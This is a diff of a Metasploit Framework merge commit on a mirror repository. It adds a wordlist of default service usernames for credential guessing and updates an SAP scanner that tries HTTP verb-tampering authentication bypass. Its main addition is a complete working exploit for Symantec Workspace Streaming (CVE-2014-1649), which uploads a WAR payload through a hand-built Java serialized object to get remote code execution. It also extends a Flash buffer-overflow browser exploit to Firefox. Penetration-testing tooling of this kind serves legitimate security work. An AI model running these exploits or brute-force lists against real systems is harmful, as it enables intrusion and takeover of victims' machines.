infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:rapid7/metasploit-framework into feature/recog

bug/bundler_fix
HD Moore 2014-05-19 11:42:30 -05:00
parent 81194684ae a30d6b1f2d
commit ddc8a4f103
10 changed files with 4364 additions and 76 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1214
data/wordlists/default_pass_for_services_unhash.txt Normal file
View File

File diff suppressed because it is too large Load Diff

1787
data/wordlists/default_userpass_for_services_unhash.txt Normal file
View File

File diff suppressed because it is too large Load Diff

915
data/wordlists/default_users_for_services_unhash.txt Normal file
View File

@ -0,0 +1,915 @@
admin
root
Administrator
sysadm
tech
operator
guest
security
debug
manager
service
!root
user
netman
super
diag
Cisco
Manager
DTA
apc
User
Admin
cablecom
adm
wradmin
netscreen
sa
setup
cmaker
enable
MICRO
login
write
monitor
netopia
op
adminview
sysadmin
echo
craft
maint
comcast
CSG
readonly
manuf
cusadmin
smc
sweex
disttech
su
poll
SYSDBA
anonymous
support
recovery
USERID
eng
administrator
NETWORK
JDE
Guest
rwa
USER
test
lp
ro
MAIL
ami
hsa
system
MGR
ADMINISTRATOR
FIELD
PBX
HELLO
hscroot
1502
superuser
netrangr
readwrite
piranha
wlse
l3
none
naadmin
public
NETOP
MANAGER
demo
D-Link
l2
rw
cgadmin
storwatch
vcr
OPERATOR
MDaemon
jagadmin
enquiry
at4400
davox
PFCUser
aaa
topicalt
admin2
1234
nms
client
sys
field
deskman
SYSADM
superadmin
pmd
GEN2
ADMN
Factory
PRODDTA
tellabs
spcl
dadmin
helpdesk
dhs3mt
install
adfexc
IntraSwitch
manage
superman
SPOOLMAN
ADVMAIL
vt100
PSEAdmin
patrol
teacher
PCUSER
Any
RSBCMON
cellit
inads
halt
locate
TMAR#HWMT8007079
rapport
xbox
device
NICONEX
acc
31994
bcim
websecadm
blue
topicnorm
supervisor
ccrusr
266344
telecom
GEN1
SSA
HTTP
mtch
bciim
browse
hydrasna
deskres
bbsd-client
replicator
intel
radware
intermec
mlusr
init
e250
Polycom
temp1
mac
3comcso
RMUser1
WP
NAU
rcust
mtcl
topicres
bcnas
adminuser
Root
cac_admin
mediator
Anonymous
kermit
volition
GlobalAdmin
LUCENT01
LUCENT02
adminstat
desknorm
IntraStack
e500
deskalt
cust
tiara
bcms
m1122
telco
xd
dhs3pms
VNC
customer
cisco
adminstrator
ftp_nmc
me
iclock
scmadmin
installer
webadmin
ftp_inst
DDIC
SYSTEM
draytek
EARLYWATCH
super.super
ftp_oper
corecess
weblogic
system/manager
End
d.e.b.u.g
target
MD110
tiger
adminttd
wlseuser
SAPCPIC
ftp_admi
default.password
7
2
ADMIN
itsadmin
PUBSUB
CTXSYS
ftp
bill
192.168.1.1
setpriv
GUEST
SAP*
t3admin
hello
CISCO15
1.79
mso
Telecom
qsysopr
APPS
Developer
mail
qsecofr
11111
Service
netadmin
any
db2fenc1
johnson
isp
demos
QSRV
MDSYS
vpasp
TEST
QSECOFR
1
informix
5
engmode
scout
qpgmr
ADSL
images
Gearguy
Demo
serial#
BACKUP
stratacom
6.x
mary
COMPANY
SYS
DSL
Jetform
eagle
ROUTER
ods
siteadmin
Alphanetworks
Admin1
janta
servlet
username
citel
Replicator
SYSMAN
master
SUPERUSER
cn=orcladmin
30
maintainer
BRIO_ADMIN
internal
CQSCHEMAUSER
DEV2000_DEMOS
FSFTASK1
checkfs
USER1
SQLDBA
HELP
toor
qsrvbas
SYSADMIN
EZsetup
BATCH
STRAT_USER
primenet
OEMREP
USER6
lynx
powerdown
$ALOC$
password
VOL-0215
tomcat
REP_MANAGER
WinCCConnect
ALLIN1
DIRMAINT
eqadmin
QSRVBAS
AQJAVA
LASERWRITER
PERFSTAT
apcuser
MBWATCH
system_admin
unix
OWNER
NETPRIV
VSEMAINT
DEMO
SYMPA
REP_OWNER
DCL
FAX
ARCHIVIST
VTAMUSER
VMTAPE
basisk
NetLinx
OutOfBox
NETMGR
DEFAULT
OAS_PUBLIC
read
AP
MTSSYS
SYSMAINT
AUDIOUSER
Joe
IDMS
$SRV
snake
ROOT
PRINTER
shutdown
satan
RDM470
trouble
fax
OP1
admin@example.com
HOST
ADLDEMO
QS_ADM
bin
OPER
oracle
jj
PO7
www
joe
MAINT
CMSBATCH
CCC
role1
DATAMOVE
MSHOME
ISPVM
crowd­-openid-­server
user_editor
sedacm
db2admin
Airaya
SYSDUMP1
IMEDIA
primos_cs
USER_TEMPLATE
pnadmin
lpadmin
VTAM
TRACESVR
POSTMASTER
MAILER
RSCSV2
QS_WS
circ
nobody
Tasman
DISCOVERER_ADMIN
VMASMON
LR-ISDN
TURBINE
GL
PO
PRINT
MODTEST
GATEWAY
PRIMARY
both
haasadm
pw
games
DOCSIS_APP
bbs
EMP
postmaster
SITEMINDER
vgnadmin
RJE
gonzo
NEWS
AQUSER
UTLBSTATU
netbotz
xmi_demo
ORACACHE
MCUser
prash
sync
PM
AP2SVP
ibm
ULTIMATE
SABRE
user_pricer
SUPERVISOR
EVENT
PORTAL30_SSO_PS
FSFADMIN
OO
WKSYS
OPERATNS
UVPIM_
OE
OCITEST
web
ESSEX
None
CTXDEMO
user_designer
QDBA
role
LRISDN
tele
WEBCAL01
rsadmin
OMWB_EMULATION
WINDOWS_PASSTHRU
MOREAU
fast
host
ORDPLUGINS
SYSWRM
savelogs
SDOS_ICSAP
DSSYS
MGWUSER
TDOS_ICSAP
ssp
EJSADMIN
INGRES
DS
estheralastruey
VCSRV
ssladmin
CLARK
OEMADM
restoreonly
quser
MILLER
trmcnfg
REPORT
user_author
dpn
tour
mountfsys
http
PROG
openfiler
RAID
STARTER
FAXUSER
DSA
daemon
mountsys
backuponly
IVPM1
USER3
OPENSPIRIT
prime
HPLASER
CSPUSER
qsvr
SYSCKP
Sysop
user_marketer
IMAGEUSER
bsxuser
MASTER
USER9
OLAPSYS
rje
ODM_MTR
QS_ES
lansweeperuser
DEMO3
Username
GPLD
uucp
DBSNMP
VMARCH
SWUSER
Operator
CHEY_ARCHSVR
roo
n.a
accounting
backuprestore
dni
WEBADM
iceman
guru
anon
USER8
PORTAL30_SSO_PUBLIC
postgres
WINSABRE
USERP
IVPM2
PORTAL30_SSO
ALLIN1MAIL
POST
TEMP
BATCH1
PROMAIL
SECDEMO
ARAdmin
sadmin
ORAREGSYS
VMASSYS
man
FROSTY
LASER
tutor
DISKCNT
default
SYSERR
WWW
VAX
PROCAL
FAXWORKS
LDAP_Anonymous
(any
setup/snmp
DSGATEWAY
AWARD_SW
CSMIG
umountfsys
VMS
bpel
viewuser
TDISK
politically
user_analyst
RSCS
COMPIERE
OSP22
guest1
FORSE
factory
bubba
QUSER
primeos
glftpd
RMAN
mountfs
DIRECT
firstsite
IPFSERV
TSUSER
BATCH2
snmp
WebAdmin
IBMUSER
SMART
voadmin
BC4J
core
OPERVAX
Bobo
WANGTEK
OWA
USER2
jasperadmin
VMBSYSAD
PVM
ctb_admin
 
DEMO4
qsrv
superdba
PORTAL30
XPRT
Crowd
18364
ilom-admin
rdc123
sysopr
tasman
blank
WEBREAD
ODM
11111111
AURORA$ORB$UNAUTHENTICATED
ADAMS
Craft
rfmngr
SYSTEST_CLIG
user_approver
ilom-operator
Nice-admin
answer
NETNONPRIV
nuucp
CIDS
VASTEST
redline
MBMANAGER
webmaster
APPLSYS
USER4
hqadmin
UOMNI_
VMUTIL
uucpadm
EXFSYS
4Dgifts
JMUSER
CIS
UNITY_
HLW
pwrchute
IDMSSE
NSA
TELEDEMO
recover
TRAVEL
lexar
viewer
LIBRARY
PO8
root@localhost
NAMES
secofr
PDMREMI
MGE
USER7
OWA_PUBLIC
questra
builtin
SFCNTRL
boss
PLEX
OLAPDBA
OLAPSVR
user_expert
Bhosda
gropher
TAHITI
NEWINGRES
VM3812
VIF_DEVELOPER
joeuser
IPC
HELPDESK
wlpisystem
TSAFVM
prtgadmin
UAMIS_
theman
CISINFO
mobile
QS_CB
CDEMORID
DEMO2
PORTAL30_PUBLIC
MDDEMO_CLERK
PHANTOM
ODS
BLAKE
TSDEV
PRODBM
dos
APL2PP
god1
CICSUSER
22222222
user_publisher
OSE$HTTP$ADMIN
def
SuperUser
QS_CBADM
SYSA
STUDENT
Draytek
SMDR
EREP
VSEMAN
fwadmin
MTS_USER
AQDEMO
private
IS_$hostname
HPSupport
ORASSO
CVIEW
SH
XXSESS_MGRYY
VMMAP
PORTAL30_DEMO
Ezsetup
QS_CS
CMSUSER
DEMO1
userNotUsed
ncadmin
TESTPILOT
fg_sysadmin
UETP
QS
DBI
JWARD
APPS_MRC
Moe
SENTINEL
Yak
PDP11
Flo
SLIDE
INFO
checkfsys
PRODCICS
MXAGENT
VMTLIBR
POWERCARTUSER
VMBACKUP
CPNUC
distrib
MIGRATE
CDEMOUCB
OLTSEP
sysbin
signa
autocad
WEBDB
ncrm
SAMPLE
HCPARK
ALLINONE
nm2user
SAVSYS
IIPS
PATROL
mailadmin
TMSADM
ESubscriber
software
god2
FSFTASK2
ORDSYS
gopher
PSFMAINT
EAdmin
12345
DECNET
OPERATIONS
$system
PANAMA
LIBRARIAN
fal
NETSERVER
POWERCHUTE
USER5
GPFD
QS_OS
REPADMIN
0
DEMO8
DEMO9
CDEMO82
umountsys
USER0
CDEMOCOR
SYSTEST
Rodopi
user_checker
qserv
AQ
SAPR3
VRR1
fastwire
admi
FINANCE
WinCCAdmin
ESTOREUSER
VIRUSER
LINK
APPLSYSPUB
overseer
checksys
umountfs
DBDCCICS
TOAD
ntpupdate
MDDEMO_MGR
billy-bob
DECMAIL
alien
nsroot
AdvWebadmin
dvstation
SERVICECONSUMER1
MMO2
NOC
WWWUSER
SAP
NEVIEW
ODSCOMMON
pixadmin
ripeop
PENG
netlink
L2LDEMO
OUTLN
12.x
scott
dbase
fam
Oper
RMAIL
FND
PRIV
SETUP
news
VSEIPO
ilon
PLSQL
politcally
18140815
APPUSER
CENTRA
LBACSYS
PDP8
SFCMI
lpadm
Test
bewan
DIP
mfd
MDDEMO
SWPRO
DES
Coco
GCS
rodopi
Scott
Admin5
ANDY
DESQUETOP
NETCON
JONES
author
MOESERV
PUBSUB1
CATALOG
SQLUSER
RE
REPORTS_USER
MFG
HR
VIDEOUSER
DBA
AUTOLOG1
AURORA$JIS$UTILITY$
wlcsystem
CPRM

2
modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb
View File

@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The
vulnerability exists in the DBVisitor.dll component, and can be abused through malicious
requests to the ChartThemeConfig web service. This module can be used to extract the site
and projects usernames and hashes.
and project usernames and hashes.
},
'References' =>
[

144
modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
View File

@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
@ -30,143 +29,160 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]),
OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
OptPath.new('URLFILE', [true, "SAP ICM Paths File",
File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')])
], self.class)
end
# Base Structure of module borrowed from jboss_vulnscan
def run_host(ip)
# If URLFILE is set empty, obviously the user made a silly mistake
if datastore['URLFILE'].empty?
print_error("Please specify a URLFILE")
return
end
# Initialize the actual URLFILE path
if datastore['URLFILE'] == "sap_icm_paths.txt"
url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
else
# Not the default sap_icm_paths file
url_file = datastore['URLFILE']
end
# If URLFILE path doesn't exist, no point to continue the rest of the script
if not File.exists?(url_file)
print_error("Required URL list #{url_file} was not found")
return
end
res = send_request_cgi(
res = send_request_cgi(
{
'uri' => "/" + Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
})
if res
print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
@info = []
if not res.headers['Server'].nil?
if res.headers['Server']
@info << res.headers['Server']
print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
else
print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
end
if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) )
print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
end
# Load URLs
urls_to_check = []
File.open(url_file) do |f|
urls_to_check = check_urlprefixes
File.open(datastore['URLFILE']) do |f|
f.each_line do |line|
urls_to_check.push line
end
end
print_status("#{rhost}:#{rport} Beginning URL check")
@valid_urls = ''
urls_to_check.each do |url|
check_url(url.strip)
end
# check custom URLs
check_urlprefixes
else
print_error("#{rhost}:#{rport} No response received")
end
if @valid_urls.length > 0
l = store_loot(
'sap.icm.urls',
"text/plain",
datastore['RHOST'],
@valid_urls,
"icm_urls.txt", "SAP ICM Urls"
)
print_line
print_good("Stored urls as loot: #{l}") if l
end
end
def check_url(url)
full_url = write_url(url)
res = send_request_cgi({
'uri' => url,
'uri' => normalize_uri(url),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
})
if (res)
if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
if res.headers['Server']
unless @info.include?(res.headers['Server'])
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
end
end
case
when res.code == 200
print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})")
when res.code == 403
print_good("#{rhost}:#{rport} #{url} - restricted (403)")
when res.code == 401
print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
case res.code
when 200
print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})")
@valid_urls << full_url << "\n"
when 403
print_status("#{full_url} - restricted (#{res.code})")
when 401
print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}")
@valid_urls << full_url << "\n"
# Attempt verb tampering bypass
bypass_auth(url)
when res.code == 404
when 404
# Do not return by default, only display in verbose mode
vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
when res.code == 500
print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
when res.code == 301, res.code == 302
print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
vprint_status("#{full_url} - not found (#{res.code})")
when 400, 500
print_status("#{full_url} - produced a server error (#{res.code})")
when 301, 302
print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
@valid_urls << full_url << "\n"
when 307
print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
else
vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
print_error("#{full_url} - unhandled response code #{res.code}")
@valid_urls << full_url << "\n"
end
else
print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)")
vprint_status("#{full_url} - not found (No Repsonse code Received)")
end
end
def write_url(path)
if datastore['SSL']
protocol = 'https://'
else
protocol = 'http://'
end
"#{protocol}#{rhost}:#{rport}#{path}"
end
def bypass_auth(url)
print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
full_url = write_url(url)
vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})")
res = send_request_raw({
'uri' => url,
'uri' => normalize_uri(url),
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
}, 20)
})
if (res and res.code == 200)
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})")
if (res && res.code == 200)
print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
# "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS.
# This is how the message server finds out which URLs must be forwarded where.
# (SAP help) -> this disclose custom URLs that are also checked for authentication
def check_urlprefixes
# "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." (SAP help)
# -> this disclose custom URLs that are also checked for authentication
urls = []
res = send_request_cgi({
'uri' => "/sap/public/icf_info/urlprefix",
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (res and res.code == 200)
})
if (res && res.code == 200)
res.body.each_line do |line|
if line =~ /PREFIX=/
url_enc = line.sub(/^PREFIX=/, '')
# Remove CASE and VHOST
url_enc = url_enc.sub(/&CASE=.*/, '')
url_dec = URI.unescape(url_enc).sub(/;/, '')
check_url(url_dec.strip)
urls << url_dec.strip
end
end
else
print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
end
urls
end
end

4
modules/auxiliary/scanner/snmp/brocade_enumhash.rb
View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
row.each { |val| @hashes << val.value.to_s }
end
print_good("#{ip} Found Users & Password Hashes:")
print_good("#{ip} - Found user and password hashes:")
end
credinfo = ""
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end

2
modules/auxiliary/scanner/snmp/netopia_enum.rb
View File

@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end

2
modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
View File

@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("#{ip} error: #{e.class} #{e}")
print_error("#{ip} - Error: #{e.class} #{e}")
disconnect_snmp
end
end

356
modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb Normal file
View File

@ -0,0 +1,356 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Workspace Streaming Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in Symantec Workspace Streaming. The
vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
as_agent.exe service, which allows for uploading arbitrary files under the server root.
This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
to achieve remote code execution. This module has been tested successfully on Symantec
Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
machine deployment, and also in the backend role in a multiple machine deployment.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-1649'],
['BID', '67189'],
['ZDI', '14-127'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
],
'Privileged' => true,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 12 2014'))
register_options(
[
Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
], self.class)
end
def send_xml_rpc_request(xml)
res = send_request_cgi(
{
'uri' => normalize_uri("/", "xmlrpc"),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => xml
})
res
end
def build_soap_get_file(file_path)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.getFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file_name = params.add_element("param")
value_file_name = param_file_name.add_element("value")
value_file_name.text = file_path
param_file_binary = params.add_element("param")
value_file_binary = param_file_binary.add_element("value")
type_file_binary = value_file_binary.add_element("boolean")
type_file_binary.text = "0"
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_put_file(file)
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
params = xml.root.add_element("params")
param_server_root = params.add_element("param")
value_server_root = param_server_root.add_element("value")
value_server_root.text = "*AWESE"
param_file_type = params.add_element("param")
value_file_type = param_file_type.add_element("value")
type_file_type = value_file_type.add_element("i4")
type_file_type.text = "0" # build path from the server root directory
param_file = params.add_element("param")
value_file = param_file.add_element("value")
type_value_file = value_file.add_element("ex:serializable")
type_value_file.text = file
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def build_soap_check_put
xml = Document.new
xml.add_element(
"methodCall",
{
'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
})
method_name = xml.root.add_element("methodName")
method_name.text = "ManagementAgentServer.putFile"
xml.root.add_element("params")
xml << XMLDecl.new("1.0", "UTF-8")
xml.to_s
end
def parse_method_response(xml)
doc = Document.new(xml)
file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
unless file.nil?
file = Rex::Text.decode_base64(file.text)
end
file
end
def get_file(path)
xml_call = build_soap_get_file(path)
file = nil
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
file = parse_method_response(res.body.to_s)
end
file
end
def put_file(file)
result = nil
xml_call = build_soap_put_file(file)
res = send_xml_rpc_request(xml_call)
if res && res.code == 200 && res.body
result = parse_method_response(res.body.to_s)
end
result
end
def upload_war(war_name, war, dst)
result = false
java_file = build_java_file_info("#{dst}#{war_name}", war)
java_file = Rex::Text.encode_base64(java_file)
res = put_file(java_file)
if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
result = true
end
result
end
def jboss_deploy_path
path = nil
leak = get_file("bin/CreateDatabaseSchema.cmd")
if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
path = $1
end
path
end
def check
check_result = Exploit::CheckCode::Safe
if jboss_deploy_path.nil?
xml = build_soap_check_put
res = send_xml_rpc_request(xml)
if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
check_result = Exploit::CheckCode::Detected
end
else
check_result = Exploit::CheckCode::Appears
end
check_result
end
def exploit
print_status("#{peer} - Leaking the jboss deployment directory...")
jboss_path =jboss_deploy_path
if jboss_path.nil?
fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
end
print_status("#{peer} - Building WAR payload...")
app_name = Rex::Text.rand_text_alpha(4 + rand(4))
war_name = "#{app_name}.war"
war = payload.encoded_war({ :app_name => app_name }).to_s
deploy_dir = "..#{jboss_path}"
print_status("#{peer} - Uploading WAR payload...")
res = upload_war(war_name, war, deploy_dir)
unless res
fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
end
register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET',
'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
def ste_port
datastore['STE_PORT']
end
# com.appstream.cm.general.FileInfo serialized object
def build_java_file_info(file_name, contents)
stream = "\xac\xed" # stream magic
stream << "\x00\x05" # stream version
stream << "\x73" # new Object
stream << "\x72" # TC_CLASSDESC
stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
stream << "com.appstream.cm.general.FileInfo"
stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [6].pack("n") # number of fields in the class
stream << "Z" # boolean
stream << ["bLastPage".length].pack("n")
stream << "bLastPage"
stream << "J" # long
stream << ["lFileSize".length].pack("n")
stream << "lFileSize"
stream << "[" # array
stream << ["baContent".length].pack("n")
stream << "baContent"
stream << "\x74" # TC_STRING
stream << ["[B".length].pack("n")
stream << "[B" # field's type (byte array)
stream << "L" # Object
stream << ["dTimeStamp".length].pack("n")
stream << "dTimeStamp"
stream << "\x74" # TC_STRING
stream << ["Ljava/util/Date;".length].pack("n")
stream << "Ljava/util/Date;" #field's type (Date)
stream << "L" # Object
stream << ["sContent".length].pack("n")
stream << "sContent"
stream << "\x74" # TC_STRING
stream << ["Ljava/lang/String;".length].pack("n")
stream << "Ljava/lang/String;" #field's type (String)
stream << "L" # Object
stream << ["sFileName".length].pack("n")
stream << "sFileName"
stream << "\x71" # TC_REFERENCE
stream << [0x007e0003].pack("N") # handle
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
# Values
stream << [1].pack("c") # bLastPage
stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
stream << "\x75" # TC_ARRAY
stream << "\x72" # TC_CLASSDESC
stream << ["[B".length].pack("n")
stream << "[B" # byte array)
stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
stream << "\x02" # flags SC_SERIALIZABLE
stream << [0].pack("n") # number of fields in the class
stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
stream << [contents.length].pack("N")
stream << contents # baContent
stream << "\x70" # TC_NULL # dTimeStamp
stream << "\x70" # TC_NULL # sContent
stream << "\x74" # TC_STRING
stream << [file_name.length].pack("n")
stream << file_name # sFileName
stream
end
end

14
modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
View File

@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
vulnerability occurs in the flash.Display.Shader class, when setting specially
crafted data as its bytecode, as exploited in the wild in April 2014. This module
has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over
Windows XP SP3, Windows 7 SP1 and Windows 8.
has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
# Disabled by default to allow sessions on Firefox, still useful when exploiting IE
#'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
},
@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
'BrowserRequirements' =>
{
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF},
:flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
},
'Targets' =>
@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
@ -111,6 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
</object>
</body>
</html>